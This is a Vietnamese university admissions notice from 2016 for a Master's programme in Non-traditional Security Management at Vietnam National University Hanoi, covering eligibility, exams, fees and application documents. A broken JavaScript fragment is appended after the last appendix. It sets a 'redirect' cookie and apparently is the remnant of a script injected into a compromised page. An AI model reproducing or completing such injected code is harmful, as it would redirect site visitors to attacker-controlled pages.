DSC 0671Theo quyết định số 3070/QĐ-ĐHQGHN ngày 14/10/2015 của Giám đốc ĐHQGHN, HSB sẽ tiến hành tuyển sinh chương trình đào tạo Thạc sỹ Quản trị An ninh phi truyền thống (MNS) với các thông tin cụ thể như sau:

 

ĐẠI HỌC QUỐC GIA HÀ NỘI

KHOA QUẢN TRỊ KINH DOANH

___________ 

Số: 96A/TB-QTKD

 

CỘNG HOÀ XÃ HỘI CHỦ NGHĨA VIỆT NAM

Độc lập – Tự do – Hạnh phúc

_______________________ 

Hà Nội, ngày 12  tháng 05   năm 2016

 THÔNG BÁO TUYỂN SINH ĐỢT 2, NĂM 2016

 

Chương trình đào tạo Thạc sĩ Quản trị An ninh phi truyền thống (MNS) do ĐHQGHN cấp bằng

Khoa Quản trị Kinh doanh (HSB), trực thuộc Đại học Quốc gia Hà Nội (VNU) được thành lập ngày 13/07/1995 theo quyết định của cố GS. Viện sỹ Nguyễn Văn Đạo, giám đốc đầu tiên của VNU. Kể từ đó đến nay, HSB luôn đi tiên phong tại Việt Nam về các chương trình đào tạo Thạc sỹ Quản trị Kinh doanh (MBA) và các khóa đào tạo Quản trị Kinh doanh liên kết với các Trường đại học hàng đầu trên thế giới như Northwestern (Thụy sỹ), Hawaii (Mỹ) và IPAG (Pháp). Hiện nay, HSB đã trở thành một thương hiệu nổi tiếng và dẫn đầu Việt Nam với các chương trình đào tạo thạc sỹ, các khóa đào tạo quản trị điều hành và các hoạt động tư vấn cho cả khu vực công và tư.

Phù hợp với Nghị quyết Hội nghị lần thứ 8 Ban chấp hành Trung ương Đảng Khóa XI về chiến lược bảo vệ Tổ quốc trong tình hình mới, trong đó đã xác định những vấn đề an ninh mới (an ninh phi truyền thống) đang trở thành mối nguy cơ trực tiếp, thường xuyên tới an ninh quốc gia, an ninh cộng đồng và an ninh doanh nghiệp của Việt Nam, chương trình MNS ra đời nhằm đáp ứng kịp thời nhu cầu bức thiết trong việc nghiên cứu và đào tạo nhân lực cho lĩnh vực đào tạo còn nhiều mới mẻ nhưng có vai trò đặc biệt quan trọng này.

Theo quyết định số 3070/QĐ-ĐHQGHN ngày 14/10/2015 của Giám đốc ĐHQGHN, HSB sẽ tiến hành tuyển sinh chương trình đào tạo Thạc sỹ Quản trị An ninh phi truyền thống (MNS) với các thông tin cụ thể như sau:

  1. 1.Ngành, chuyên ngành

          Ngành: Quản trị An ninh

          Chuyên ngành: Quản trị An ninh phi truyền thống, mã ngành 60901101

  1. 2.Thời gian thi tuyển: Ngày 17 và 18 tháng 09 năm 2016
  2. 3.Thời gian đào tạo

          Thời gian đào tạo chính thức: từ 18 đến 24 tháng, học vào sáng và chiều các ngày thứ 7 và Chủ nhật hàng tuần

          Thời gian kéo dài: được phép là 2 năm (24 tháng)

  1. 4.Điều kiện dự thi

4.1.            Điều kiện văn bằng, chứng chỉ

(1)    Nhóm 1 gồm các ngành học phù hợp: Có bằng tốt nghiệp đại học các ngành thuộc khối ngành: kinh doanh và quản lý, pháp luật, an ninh – quốc phòng.

Các học viên nhóm này phải tham gia học và có chứng chỉ bổ sung kiến thức qua 3 môn học (tổng cộng 9 tín chỉ) trước khi tham gia thi đầu vào:

+ Tổng quan về phát triển bền vững                                (3 tín chỉ)

+ Hội nhập toàn cầu và an ninh                                       (3 tín chỉ)

+ Hệ thống pháp luật Việt Nam về an toàn và an ninh   (3 tín chỉ)

(2)     Nhóm 2 gồm các ngành gần: Có bằng tốt nghiệp đại học các ngành thuộc nhóm khối ngành: khoa học tự nhiên, khoa học sự sống, toán và thống kê, máy tính và công nghệ thông tin, kỹ thuật, công nghệ kỹ thuật, kiến trúc và xây dựng, sản xuất và chế biến, nông-lâm nghiệp và thủy sản, thú y, môi trường và bảo vệ môi trường, sức khỏe, nhân văn, khoa học xã hội và hành vi, báo chí và thông tin, nghệ thuật, khoa học giáo dục và đào tạo giáo viên.

          Các học viên nhóm này phải tham gia học và có chứng chỉ bổ sung kiến thức qua 5 môn học (tổng cộng 15 tín chỉ) trước khi tham gia thi đầu vào:

          + Khoa học quản trị                                                         (3 tín chỉ)

+ Phương pháp nghiên cứu khoa học                              (3 tín chỉ)

+ Tổng quan về phát triển bền vững                                (3 tín chỉ)

+ Hội nhập toàn cầu và an ninh                                       (3 tín chỉ)

+ Hệ thống pháp luật Việt Nam về an toàn và an ninh   (3 tín chỉ)

4.2.      Điều kiện thâm niên công tác

Người dự thi phải có tối thiểu 01 năm kinh nghiệm công tác trong lĩnh vực liên quan đến các hoạt động quản lí Nhà nước, hành chính, an ninh, kinh tế – xã hội, kinh doanh, ngoại giao, hoặc các hoạt động liên quan tới an ninh phi truyền thống.

5.   Yêu cầu về môn thi

 –    Các môn thi tuyển:

+ Ngoại ngữ: tiếng Anh theo quy định của ĐHQGHN

+ Môn cơ bản: Đánh giá năng lực

+ Môn cơ sở: Tổng quan về phát triển bền vững

           –  Thí sinh có năng lực ngoại ngữ đúng với yêu cầu môn thi ngoại ngữ của đơn vị đào tạo thuộc một trong các trường hợp sau được miễn thi môn ngoại ngữ:

+ Có bằng tốt nghiệp đại học, thạc sỹ, tiến sĩ được đào tạo toàn thời gian ở nước ngoài, được cơ quan có thẩm quyền công nhận văn bằng theo qui định hiện hành;

+ Có bằng tốt nghiệp đại học chương trình tiên tiến theo Đề án của Bộ GD&ĐT về đào tạo chương trình tiên tiến ở một số trường đại học của Việt Nam hoặc bằng kĩ sư chất lượng cao (PFIEV) được ủy ban bằng cấp kĩ sư (CTI, Pháp) công nhận, có đối tác nước ngoài cùng cấp bằng hoặc bằng tốt nghiệp đại học chương trình đào tạo chuẩn quốc tế, chương trình đào tạo tài năng, chương trình đào tạo chất lượng cao của ĐHQGHN;

+ Có bằng tốt nghiệp đại học ngành ngôn ngữ nước ngoài;

            + Có chứng chỉ trình độ ngoại ngữ tương đương các bậc của Khung năng lực ngoại ngữ bậc 3. Chứng chỉ có giá trị trong thời hạn 2 năm kể từ ngày thi chứng chỉ ngoại ngữ đến ngày đăng ký dự thi thạc sĩ và được cấp bởi cơ sở được ĐHQGHN công nhận (Phụ lục I và Phụ lục II);

           6. Đối tượng và chính sách ưu tiên:

           6.1 Đối tượng ưu tiên

 –   Có thời gian công tác hai năm liên tục trở lên (tính đến ngày hết hạn nộp hồ sơ đăng ký dự thi) tại các địa phương được quy định là Khu vực 1 trong Quy chế tuyển sinh đại học, cao đẳng hệ chính qui hiện hành. Trong trường hợp này, thí sinh phải có quyết định tiếp nhận công tác hoặc điều động, biệt phái công tác của cơ quan, tổ chức có thẩm quyền;

 –   Người dân tộc thiểu số có hộ khẩu thường trú từ hai năm trở lên (tính đến ngày hết hạn nộp hồ sơ đăng ký dự thi) tại các địa phương được quy định là Khu vực 1 trong Quy chế tuyển sinh đại học, cao đẳng hệ chính qui hiện hành;

 –   Th­ương binh, bệnh binh, người có giấy chứng nhận được hư­ởng chính sách như­ thương binh;

 –   Con liệt sỹ;

 –   Anh hùng lực lư­ợng vũ trang, anh hùng lao động, người có công với cách mạng;

 –  Con đẻ của người hoạt động kháng chiến bị nhiễm chất độc hóa học được ủy ban nhân cấp tỉnh công nhận bị dị dạng, dị tật, suy giảm khả năng tự lực trong sinh hoạt, học tập do hậu quả của chất độc hóa học.

6.2 Mức ưu tiên

           –  Người dự thi thuộc đối tượng ưu tiên (gồm cả người thuộc nhiều đội tượng ưu tiên) được cộng vào kết quả thi 10 điểm cho môn ngoại ngữ (thang điểm 100) nếu không thuộc diện được miễn thi ngoại ngữ và cộng 01 điểm (thang điểm 10) cho môn thi cơ bản hoặc 15 điểm (thang điểm 150) cho môn thi đáng giá năng lực.

  1. 7.Đăng ký dự thi và học bổ sung kiến thức:

Nội dung / Thời gian

10/5

13/8

15/8

17,18/9

7.1 Phát hành hồ sơ

 

 

 

THI

7.2 Đăng ký hồ sơ

 

Hết hạn

 

 

7.3 Học bổ sung kiến thức của MNS

 

 

 

 

       Đăng ký

 

 

 

 

       Khai giảng

 

 

 

 

7.4 Học ôn tập (tiếng Anh, đánh giá năng lực)

 

 

 

 

       Đăng ký

 

 

 

 

       Khai giảng lớp tiếng Anh

 

 

 

 

       Khai giảng lớp đánh giá năng lực

 

 

 

 

Lưu ý: Lịch học các lớp bổ sung kiến thức và ôn tập sẽ được cung cấp chi tiết tới học viên trước ngày khai giảng từng lớp.

  1. 8.Kinh phí đào tạo

8.1. Học phí toàn khóa

       Học phí của chương trình đào tạo Thạc sỹ Quản trị An ninh phi truyền thống: 110 triệu đồng / khóa 02 năm

         Học phí được đóng thành các đợt theo qui định và sẽ được thông báo sau khi nhập học.

         Học viên xuất sắc có cơ hội được nhận học bổng.

         Học phí đã bao gồm toàn bộ chi phí đào tạo, hội thảo học tập, tham quan thực tế; chi phí cơ sở vật chất, phòng học, tài liệu; chi phí quản lý, dịch vụ teabreak…

         Học phí không bao gồm lệ phí dự thi đầu vào; lệ phí bảo lưu, gia hạn; lệ phí thi lại, học lại (nếu có).

8.2. Lệ phí dự thi đợt 2, năm 2016

         Lệ phí hồ sơ: 50.000 đồng/thí sinh

         Lệ phí đăng kí hồ sơ dự thi: 100.000 đồng/thí sinh

         Lệ phí dự thi: 500.000 đồng/thí sinh (400.000 đồng/thí sinh đối với thí sinh được miễn thi môn tiếng Anh).

         Lệ phí học bổ sung kiến thức: 300.000đ/tín chỉ

         Lệ phí học ôn: sẽ thông báo theo lịch học của từng lớp

  1. 9.Hồ sơ đăng ký

9.1. Hồ sơ đăng ký học bổ sung kiến thức, gồm:

         01 bản sao hợp lệ Bằng đại học

         01 bản sao hợp lệ Bảng điểm

         01 phiếu đăng ký dự thi (theo mẫu)

9.2. Hồ sơ đăng ký dự thi: được phát hành theo mẫu tại Khoa Quản trị Kinh doanh, ĐHQGHN;  gồm các giấy tờ sau:

  1. A.Giấy tờ bắt buộc:

Phiếu đăng ký dự thi theo mẫu của HSB

:

01

bản gốc

Sơ yếu lý lịch có xác nhận của thủ trưởng cơ quan hoặc chính quyền địa phương nơi thí sinh cư trú, thời hạn 6 tháng tính tới ngày dự thi

:

01

bản gốc

Giấy chứng nhận đủ sức khoẻ do bệnh viện đa khoa cấp, thời hạn trong vòng 6 tháng tính tới ngày dự thi

:

01

bản gốc

Bằng tốt nghiệp đại học

:

01

bản sao

Bảng điểm đại học

01

bản sao

QĐ tuyển dụng / QĐ bổ nhiệm / HĐLĐ dài hạn / …

:

01

bản sao

Giấy xác nhận thời gian làm việc tối thiểu 1 hoặc 2 năm liên tục của thủ trưởng cơ quan để chứng nhận thâm niên công tác

Chứng chỉ ngoại ngữ xác nhận trình độ B2 theo khung tham chiếu châu Âu hoặc tương đương (bắt buộc đối với chương trình HSB-MBA)

:

01

bản sao

Ảnh màu 4×6, chụp trong vòng 6 tháng

:

03

ảnh

  1. B.Giấy tờ khác (nếu có):

Chứng chỉ hoàn thành chương trình bổ sung kiến thức theo chuyên ngành dự thi trong thời hạn 02 năm tính tới ngày dự thi

:

01

bản sao

Chứng chỉ ngoại ngữ xác nhận trình độ dự tuyển đào tạo Sau đại học ở ĐHQGHN trong thời hạn 02 năm tính tới ngày dự thi

:

01

bản sao

CV giới thiệu đi dự thi của thủ trưởng cơ quan

:

01

bản gốc

Giấy tờ hợp pháp về đối tượng ưu tiên, gồm:

    Giấy khai sinh hoặc CMND với đối tượng dân tộc;

    Hợp đồng lao động;

    Giấy xác nhận thời gian làm việc của cơ quan;

    Giấy xác nhận công tác tại miền núi, hải đảo 2 năm liên tục do UBND xã, huyện xác nhận đối với đối tượng công tác 2 năm liên tục tại miền núi, hải đảo, vùng sâu;

:

01

bản sao

  1. 10.Địa chỉ liên hệ

Khoa Quản trị Kinh doanh (HSB), Đại học Quốc gia Hà Nội

Địa chỉ: Nhà B1, số 144 Xuân Thuỷ, Cầu Giấy, Hà Nội

Tel: 04.7548456 – Fax: 04.7548455

Phòng Tuyển sinh – Khoa Quản trị Kinh doanh

Địa chỉ: Tầng 2, nhà B1, số 144 Xuân Thuỷ, Cầu Giấy, Hà Nội

Hotline: 04. 6292.3030 – 0903.281.028 (Ms. Nguyên, Mr. Hiệu)

Email: [email protected]

 

Nơi nhận:

– Các Bộ, cơ quan ngang Bộ;

– Các Sở, Ban, Ngành, UBND các tỉnh;

– Các Học viện, trường Cao đẳng, Đại học;

– Các đơn vị thuộc HSB;

– Lưu ĐT, TT&HTHV, KHTC.

Q. CHỦ NHIỆM KHOA

 

(Đã ký)

 

 

PGS.TS. Hoàng Đình Phi

 

 

 

 

PHỤ LỤC 1.

DANH SÁCH CÁC CƠ SỞ ĐÀO TẠO CẤP CHỨNG CHỈ B1, B2 ĐƯỢC CÔNG NHẬN

(Kèm theo Thông báo số 02/TB-QTKD, ngày 06 tháng 01 năm 2015)

 

STT

Cơ sở đào tạo

Chứng chỉ B1, B2 được công nhận

Tiếng

Anh

Tiếng

Nga

Tiếng

Pháp

Tiếng  Trung

Tiếng

Đức

1

Trường ĐH Ngoại ngữ – ĐHQGHN

2

Trường ĐH Ngoại ngữ – ĐH Đà Nẵng

 

 

 

3

Trường ĐH Ngoại ngữ – ĐH Huế

 

4

Trường ĐH SP TP Hồ Chí Minh

 

5

Trường ĐH Hà Nội

 

PHỤ LỤC 2.

BẢNG THAM CHIẾU QUY ĐỔI MỘT SỐ CHỨNG CHỈ NGOẠI NGỮ TƯƠNG ĐƯƠNG CẤP ĐỘ 3/6 KHUNG NĂNG LỰC NGOẠI NGỮ 6 BẬC

(Kèm theo Thông báo số 02/TB-QTKD, ngày 06 tháng 01 năm 2015)

Tiếng Anh

Khung năng lực ngoại ngữ VN

IELTS

TOEFL

TOEIC

Cambridge Exam

BEC

BULATS

CEFR

Cấp độ 3

4.5

450 ITP

133 CBT

45 iBT

450

PET

Preliminary

40

B1

 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}